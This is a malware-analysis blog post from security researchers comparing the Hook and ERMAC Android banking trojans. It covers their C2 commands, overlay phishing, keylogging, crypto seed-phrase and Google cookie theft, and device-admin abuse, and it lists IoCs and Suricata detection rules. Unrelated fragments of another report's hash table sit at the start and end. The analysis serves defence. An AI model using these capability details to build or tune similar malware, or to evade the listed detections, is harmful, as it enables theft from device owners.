79982f39ea0c13eeb93734b12f395090db2b65851968652cab5f6b0827b49005MythicPacker152455f9d970f900eb237e1fc2c29ac4c72616485b04e07c7e733b95b6afc4d8
87269a95b1c0e724a1bfe87ddcb181eac402591581ee2d9b0f56dedbaac04ff8Cobalt Strikef3d42e4c1a47f0e1d3812d5f912487d04662152c17c7aa63e836bef01a1a4866
89196b39a0edebdf2026053cb4e87d703b9942487196ff9054ef775fdcad1899Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
91446c6d3c11074e6ff0ff42df825f9ffd5f852c2e6532d4b9d8de340fa32fb8Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
96823bb6befe5899739bd69ab00a6b4ae1256fd586159968301a4a69d675a5ecCobalt Strike3b3bdd819f4ee8daa61f07fc9197b2b39d0434206be757679c993b11acc8d05f
315217b860ab46c6205b36e49dfaa927545b90037373279723c3dec165dfaf11Cobalt Strike96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
427481ab85a0c4e03d1431a417ceab66919c3e704d7e017b355d8d64be2ccf41Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
595153eb56030c0e466cda0becb1dc9560e38601c1e0803c46e7dfc53d1d2892Cobalt Strikef245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
812263ea9c6c44ef6b4d3950c5a316f765b62404391ddb6482bdc9a23d6cc4a6Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
1358156c01b035f474ed12408a9e6a77fe01af8df70c08995393cbb7d1e1f8a6Cobalt Strikeb916749963bb08b15de7c302521fd0ffec1c6660ba616628997475ae944e86a3
73162738fb3b9cdd3414609d3fe930184cdd3223d9c0d7cb56e4635eb4b2ab67Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
384408659efa1f87801aa494d912047c26259cd29b08de990058e6b45619d91aCobalt Strike stager824914bb34ca55a10f902d4ad2ec931980f5607efcb3ea1e86847689e2957210
49925637250438b05d3aebaac70bb180a0825ec4272fbe74c6fecb5e085bcf10Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
Table 6, Hashes of Blister samples and of the payload it drops, including the payload label.

From ERMAC to Hook: Investigating the technical differences between two Android malware variants

Authored by Joshua Kamp (main author) and Alberto Segura.

Summary

Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.

After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.

Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70.000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.

The launch of Hook

On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.

Forum post where DukeEugene first advertised Hook.

Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.

Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7.000 per month.

Forum post showing the rental price of Hook, along with the claim that it was written from scratch.

The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.

Some of Hook’s features that were advertised by DukeEugene.

Command comparison

Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.

While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis did lead us to find several new commands and features on Hook, as can be seen just looking at the number of commands implemented in each variant.

SampleNumber of commands
Hook sample #158
Hook sample #268
Ermac sample #1 & #230

All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.

Automated features in the Hook C2 panel.

Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.

When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).

Hook command: start_vnc

The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.

A decompiled method that is called after the “start_vnc” command is received by the bot.

In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.


Controls for the malware operator related to the “start_vnc” command.

Command implementation

For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:

Decompiled code that is related to the “logaccounts” command in ERMAC and Hook.

This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.

Russian commands

Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.

Decompiled code which contains Russian text in ERMAC and first versions of Hook.

The command above translates to “Die_he_who_reversed_this“.

All the Russian commands create a file named “system.apk” in the “apk” directory and immediately deletes it. It appears that the authors have recently adapted their approach to managing a reputable business, as these commands were removed in the latest Hook sample that we analysed.

New commands in Hook V2

In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:

CommandDescription
send_sms_manySends an SMS message to multiple phone numbers
addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
removewaitviewRemoves the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command
addviewAdds a new view with a black background that covers the entire screen
removeviewRemoves the view with the black background that was added by the “addview” command
cookieSteals session cookies (targets victim’s Google account)
safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
takephotoTakes a photo of the victim using the front facing camera

One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.

More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.

Device Admin abuse

Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.

DeviceAdminReceiver and policies

To implement custom device admin functionality in a new class, it should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.

Defined device admin receiver in the Manifest file of Hook 2.

In the screenshot above, you can see an XML file declared as follows: android:resource=”@xml/buyanigetili. This file will contain the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:

Differences between device admin policies in ERMAC and Hook.

Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.

Device Admin PolicyDescription
USES_POLICY_FORCE_LOCKThe app can lock the device
USES_POLICY_WIPE_DATAThe app can factory reset the device
USES_POLICY_RESET_PASSWORDThe app can reset the device’s password/pin code
USES_POLICY_DISABLE_KEYGUARD_FEATURESThe app can disable use of keyguard (lock screen) features, such as the fingerprint scanner
USES_POLICY_WATCH_LOGINThe app can watch login attempts from the user

The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:


Full implementation of the class to extend the DeviceAdminReceiver in ERMAC. The first version of Hook contains the same implementation.

The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.

DeviceAdminReceiver additions in latest version of Hook

In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:

Device Admin MethodDescription
onDisableRequested()Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user
onDisabled()Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API
onEnabled()Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies
onPasswordFailed()Called when the user has entered an incorrect password for the device
onPasswordSucceeded()Called after the user has entered a correct password for the device

When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.

Decompiled code that shows the implementation of the “onDisableRequested” method in the latest version of Hook.

The fingerprint scanner will be disabled when an incorrect password was entered on the victim’s device. Possibly to make it easier to break into the device later, by forcing the victim to enter their PIN and capturing it.

Decompiled code that shows the implementation of the “onPasswordFailed” method in the latest version of Hook.

All keyguard (lock screen) features are enabled again when a correct password was entered on the victim’s device.

Decompiled code that shows the implementation of the “onPasswordSucceeded” method in the latest version of Hook.

Overlay attacks

Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.

Both ERMAC and Hook use web injections to display a phishing window as soon as it detects a targeted app being launched on the victim’s device.

Decompiled code that shows partial implementation of overlay injections in ERMAC and Hook.

In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, “text/html”, “UTF-8”, null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.

The importance of accessibility services

Accessibility Service abuse plays an important role when it comes to web injections and other automated feature in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when AccessibilityEvent is fired. Apps with accessibility service can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, they can get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as: keylogging, automatically granting itself additional permissions, and monitoring foreground apps and overlaying them with phishing windows.

When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.

Instruction window to enable the accessibility service, which is shown upon first execution of ERMAC and Hook malware.

A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.

Warning message that is displayed before enabling accessibility services.

With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.

Targeted applications

When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large amount of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].

Part of our manually crafted HTTP request that includes a list of “installed apps” for our infected device.

The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.

Part of the C2 server response that contains the target apps for overlay injections.

Keylogging

Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.

Decompiled code snippet of keylogging in ERMAC and in Hook.

The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.

Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).

It checks for these events in combination with the content change type

“CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of an UI element has changed). This tells us that the accessibility service is interested in changes of the textual content within a window, which is not surprising for a keylogger.

Stealing of crypto wallet seed phrases

Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.

For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically clicks on these elements until it navigated to the view that contains the recovery seed phrase. For the crypto wallet app, it will look like the user is browsing to this phrase by themselves.

Decompiled code that shows ERMAC and Hook searching for and clicking on UI elements in the Trust Wallet app.

Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.

Decompiled code that shows the actions in ERMAC and Hook after obtaining the seed phrase.

The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.

Replacing copied crypto wallet addresses

Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replaces the clipboard with their own wallet address. It does this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, it will replace the clipboard text with the wallet address of the threat actor.

Decompiled code that shows how ERMAC and Hook replace copied crypto wallet addresses.

The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.

Transactions received by the Ethereum wallet address of the actors.

Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.

Stealing of session cookies

The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.

Decompiled code that shows Google account session cookies will be sent to the C2 server.

All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.

DukeEugene announced new features in Hook, showing the main objective for the “cookie” command.

C2 communication protocol

HTTP in ERMAC

ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).

Decompiled code that shows how request URLs are built in ERMAC.
Example HTTP POST request that was made during dynamic analysis of ERMAC.

WebSockets in Hook

The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].

Screenshot of WebSocket communication using Socket.IO in Hook.

The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].

Mix and match – Protocols in latest versions of Hook

The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.

Decompiled code that shows the latest version of Hook implemented the same logic for building URLs as ERMAC.

Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.

The infected device is checking for commands sent by the C2 in Hook.

C2 servers

During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.

Other countries that we have found ERMAC and Hook are hosted in are:

  • The Netherlands
  • United Kingdom
  • United States
  • Germany
  • France
  • Korea
  • Japan
Popular countries for hosting Hook and ERMAC C2 servers.

The end?

On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.

DukeEugene mentions that they are closing the Hook project. Note that the first post was created on 19 April 2023 initially and edited a day later.

Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70.000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.

Hook’s coder announcing that the source code is for sale.

Observations

In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25.000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect this.

Ethereum transaction that could be related to Hook.

We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.

In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.

Conclusion

While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.

While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.

Indicators of Compromise

Analysed samples

FamilyPackage nameFile hash (SHA-256)
Hookcom.lojibiwawajinu.gunac5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622
Hookcom.wawocizurovi.gadomid651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb
ERMACcom.cazojowiruje.tutadoe0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84
ERMACcom.jakedegivuwuwe.yewo6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50

C2 servers

FamilyIP address
Hook5.42.199[.]22
Hook45.81.39[.]149
Hook45.93.201[.]92
Hook176.100.42[.]11
Hook91.215.85[.]223
Hook91.215.85[.]37
Hook91.215.85[.]23
Hook185.186.246[.]69
ERMAC5.42.199[.]91
ERMAC31.41.244[.]187
ERMAC45.93.201[.]92
ERMAC92.243.88[.]25
ERMAC176.113.115[.]66
ERMAC165.232.78[.]246
ERMAC51.15.150[.]5
ERMAC176.100.42[.]11
ERMAC91.215.85[.]22
ERMAC35.91.53[.]224
ERMAC193.106.191[.]148
ERMAC20.249.63[.]72
ERMAC62.204.41[.]98
ERMAC193.106.191[.]121
ERMAC193.106.191[.]116
ERMAC176.113.115[.]150
ERMAC91.213.50[.]62
ERMAC193.106.191[.]118
ERMAC5.42.199[.]3
ERMAC193.56.146[.]176
ERMAC62.204.41[.]94
ERMAC176.113.115[.]67
ERMAC108.61.166[.]245
ERMAC45.159.248[.]25
ERMAC20.108.0[.]165
ERMAC20.210.252[.]118
ERMAC68.178.206[.]43
ERMAC35.90.154[.]240

Network detection

The following Suricata rules were tested successfully against Hook network traffic:

# Detection for Hook/ERMAC mobile malware
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook/ERMAC HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; depth:5; content:".php/"; isdataat:!1,relative; fast_pattern; pcre:"/^\/php\/[a-z0-9]{1,21}\.php\/$/U"; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004440; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook Websocket Packet Observed (login)"; content:"|81|"; depth:1; byte_test:1,&,0x80,1; luajit:hook.lua; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004441; rev:2;)
view raw hook.rules hosted with ❤ by GitHub

The second Suricata rule uses an additional Lua script, which can be found here

List of Commands

FamilyCommandDescription
ERMAC, Hook 1 & 2sendsmsSends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2startussdExecutes a given USSD code on the victim’s device
ERMAC, Hook 1 & 2forwardcallSets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 & 2pushDisplays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 & 2getcontactsGets list of all contacts on the victim’s device
ERMAC, Hook 1 & 2getaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2logaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2getinstallappsGets a list of the installed apps on the victim’s device
ERMAC, Hook 1 & 2getsmsSteals all SMS messages from the victim’s device
ERMAC, Hook 1 & 2startinjectPerforms a phishing overlay attack against the given application
ERMAC, Hook 1 & 2openurlOpens the specified URL
ERMAC, Hook 1 & 2startauthenticator2Starts the Google Authenticator app
ERMAC, Hook 1 & 2trustLaunches the Trust Wallet app
ERMAC, Hook 1 & 2myceliumLaunches the Mycelium Wallet app
ERMAC, Hook 1 & 2piukLaunches the Blockchain Wallet app
ERMAC, Hook 1 & 2samouraiLaunches the Samourai Wallet app
ERMAC, Hook 1 & 2bitcoincomLaunches the Bitcoin Wallet app
ERMAC, Hook 1 & 2toshiLaunches the Coinbase Wallet app
ERMAC, Hook 1 & 2metamaskLaunches the Metamask Wallet app
ERMAC, Hook 1 & 2sendsmsallSends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2startappStarts the app specified in the payload
ERMAC, Hook 1 & 2clearcashSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2clearcacheSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2callingCalls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 & 2deleteapplicationUninstalls a specified application
ERMAC, Hook 1 & 2startadminSets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 & 2killmeStores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 & 2updateinjectandlistappsGets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 & 2gmailtitlesSets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 & 2getgmailmessageSets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 & 2start_vncStarts capturing the victim’s screen constantly (streaming)
Hook 1 & 2stop_vncStops capturing the victim’s screen constantly (streaming)
Hook 1 & 2takescreenshotTakes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 & 2swipePerforms a swipe gesture with the specified 4 coordinates
Hook 1 & 2swipeupPerform a swipe up gesture
Hook 1 & 2swipedownPerforms a swipe down gesture
Hook 1 & 2swipeleftPerforms a swipe left gesture
Hook 1 & 2swiperightPerforms a swipe right gesture
Hook 1 & 2scrollupPerforms a scroll up gesture
Hook 1 & 2scrolldownPerforms a scroll down gesture
Hook 1 & 2onkeyeventPerforms a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS
Hook 1 & 2onpointereventSets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 & 2longpressDispatches a long press gesture at the specified coordinates
Hook 1 & 2tapDispatches a tap gesture at the specified coordinates
Hook 1 & 2clickatClicks at a specific UI element
Hook 1 & 2clickattextClicks on the UI element with a specific text value
Hook 1 & 2clickatcontaintextClicks on the UI element that contains the payload text
Hook 1 & 2cuttextReplaces the clipboard on the victim’s device with the payload text
Hook 1 & 2settextSets a specified UI element to the specified text
Hook 1 & 2openappOpens the specified app
Hook 1 & 2openwhatsappSends a message through Whatsapp to the specified number
Hook 1 & 2addcontactAdds a new contact to the victim’s device
Hook 1 & 2getcallhistoryGets a log of the calls that the victim made
Hook 1 & 2makecallCalls the number specified in the payload
Hook 1 & 2forwardsmsSets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 & 2getlocationGets the geographic coordinates (latitude and longitude) of the victim
Hook 1 & 2getimagesGets list of all images on the victim’s device
Hook 1 & 2downloadimageDownloads an image from the victim’s device
Hook 1 & 2fmmanagerEither lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2send_sms_manySends an SMS message to multiple phone numbers
Hook 2addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2removewaitviewRemoves a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2addviewAdds a new view with a black background that covers the entire screen
Hook 2removeviewRemoves a “LinearLayout” view group, which arranges other views either horizontally in a single column or vertically in a single row. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2cookieSteals session cookies (targets victim’s Google account)
Hook 2safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2takephotoTakes a photo of the victim using the front facing camera

References


[1] – https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities
[2] – https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware
[3] – https://socket.io/docs/v4/

Approximately 2000 Citrix NetScalers backdoored in mass-exploitation campaign

